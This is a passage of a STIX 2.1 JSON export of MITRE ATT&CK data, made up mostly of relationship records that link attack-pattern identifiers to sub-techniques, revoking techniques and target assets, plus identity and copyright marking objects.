"id": "relationship--fd3ba994-75a3-4b1e-bfea-8e36b9a07015", "created": "2020-03-02T14:30:49.811Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--ca205a36-c1ad-488b-aa6c-ab34bdd3a36b", "target_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fd3bc308-82cd-49c9-a41e-9b19ce04b3cd", "created": "2023-10-02T20:23:41.227Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:23:41.227Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fd44a14f-1ca5-4356-a6fe-c5507a77d490", "created": "2020-10-19T13:40:11.238Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1", "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fd7ca8e8-82fc-443d-945a-fcef3352ec8a", "created": "2020-02-11T18:47:46.705Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--19bf235b-8620-4997-b5b4-94e0659ed7c3", "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fdb054f1-0446-4af0-b11c-790fbf352014", "created": "2020-02-05T20:10:18.912Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--2169ba87-1146-4fc7-a118-12b72251db7e", "target_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fdc20415-c9a1-405e-80af-3d297894e8fa", "created": "2023-09-28T19:58:30.849Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:58:30.849Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fe061ca4-3182-49b7-a70c-96c58e19d9bc", "created": "2020-02-11T18:46:56.347Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fe22f626-ddf3-4d5e-97d1-058878d7830f", "created": "2023-09-28T21:10:39.025Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:10:39.025Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fe265dd7-2c1a-4c75-8aa8-12d0c82c7926", "created": "2023-09-28T21:26:59.998Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:26:59.998Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fe538c59-703a-4e04-8bde-64d192db8bdd", "created": "2024-05-22T17:08:07.007Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:42:15.910Z", "description": "Asset Mapping Rationale: Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines.", "relationship_type": "targets", "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fe8358f5-ead6-4ae7-a88c-831dda8ab123", "created": "2020-01-24T19:36:42.015Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--970cdb5c-02fb-4c38-b17e-d6327cf3c810", "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--feb5c75b-6c19-48fa-aa49-f2796ae96905", "created": "2024-05-22T17:09:44.508Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:40:57.156Z", "description": "Asset Mapping Rationale: Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. ", "relationship_type": "targets", "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--febaa044-5467-4393-bd13-2d096be02cf4", "created": "2020-03-02T20:07:18.718Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", "target_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--feccce31-b855-430b-a0f6-6e3a3eb41bf9", "created": "2020-10-01T02:06:11.541Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970", "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ff021e27-63be-41f4-bc4d-2ce75d8a3ecb", "created": "2023-09-28T19:56:26.241Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:56:26.241Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ff0d8860-9790-4a15-93c7-17f01d63b2ad", "created": "2019-12-19T19:43:34.933Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ff107632-751b-4efb-86bd-af670b48d35d", "created": "2023-09-28T21:21:30.387Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:21:30.387Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ff2155fa-714d-4d99-a610-91ceb5f049ef", "created": "2020-03-11T14:28:40.164Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", "target_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "The MITRE Corporation", "identity_class": "organization", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "type": "identity", "spec_version": "2.1", "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "created": "2017-06-01T00:00:00.000Z", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "roles": [], "sectors": [], "external_references": []}, {"modified": "2023-09-27T15:31:28.155Z", "name": "Placeholder Organization Identity", "description": "This is a placeholder organization identity. Please edit it or replace it with another identity.", "roles": [], "identity_class": "organization", "sectors": [], "x_mitre_attack_spec_version": "3.1.0", "type": "identity", "spec_version": "2.1", "id": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "created": "2023-09-27T15:31:28.155Z", "external_references": [], "object_marking_refs": []}, {"definition": {"statement": "Copyright 2015-2024, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation."}, "definition_type": "statement", "x_mitre_attack_spec_version": "2.1.0", "type": "marking-definition", "spec_version": "2.1", "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", "created": "2017-06-01T00:00:00.000Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [], "object_marking_refs": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--417b208b-a354-46e2-a299-9b5c1bdafbcd", "created": "2024-07-01T10:37:15.816722", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816734", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--966b0994-c048-47dd-bc56-33170cc96e38", "created": "2024-07-01T10:37:15.816751", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816754", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--adf8e182-e8cb-401b-a898-43d22ba6fd58", "created": "2024-07-01T10:37:15.816765", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816767", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c52ed5f0-23ee-4f47-a77e-5aa6beb0ba12", "created": "2024-07-01T10:37:15.816776", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816778", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e07b45d0-0f94-40ab-a2b5-97be57647bf4", "created": "2024-07-01T10:37:15.816787", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816790", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0c6db3cd-f339-47a7-b780-282115827e69", "created": "2024-07-01T10:37:15.816799", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816801", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7a1963f4-4e64-478b-8597-143258b73068", "created": "2024-07-01T10:37:15.816810", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816812", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e9b891c9-7820-4aac-af7f-50b74b21d2df", "created": "2024-07-01T10:37:15.816821", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816823", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--84138f00-7560-454c-bf31-b78dd4afb68a", "created": "2024-07-01T10:37:15.816831", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816834", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ca08ace-b58d-4777-a394-ce1d3db7ddf0", "created": "2024-07-01T10:37:15.816842", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816844", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d9562b5b-c62f-4319-bcca-59a359ceacf3", "created": "2024-07-01T10:37:15.816852", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816854", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4ec574dd-8ea3-4730-b452-1d1ea29d98fb", "created": "2024-07-01T10:37:15.816862", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816865", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f7d14386-7df9-427a-94bb-8739e6b82b0c", "created": "2024-07-01T10:37:15.816873", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816875", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--36e384dc-7cac-4678-9c78-fc803a848386", "created": "2024-07-01T10:37:15.816884", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816886", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--60ffb4ee-6992-461d-ba67-35a5a5ffbaa2", "created": "2024-07-01T10:37:15.816894", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816896", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--06e6684d-bc67-4ce2-87df-a96f22d3f4a6", "created": "2024-07-01T10:37:15.816905", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816907", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--805582f6-012d-4418-a267-711fd88edb8e", "created": "2024-07-01T10:37:15.816915", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816917", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eb393d90-4b3e-4e0c-a637-1df83fea30c7", "created": "2024-07-01T10:37:15.816925", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816927", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--09be7955-d53d-4645-8830-d0c40f0e8eb6", "created": "2024-07-01T10:37:15.816936", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816938", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--214b21cb-05e4-41c8-aac9-99bc059fa3e0", "created": "2024-07-01T10:37:15.816946", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.816948", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b9c6460a-31ec-43d2-b258-972e092e5820", "created": "2024-07-01T10:37:15.816956", 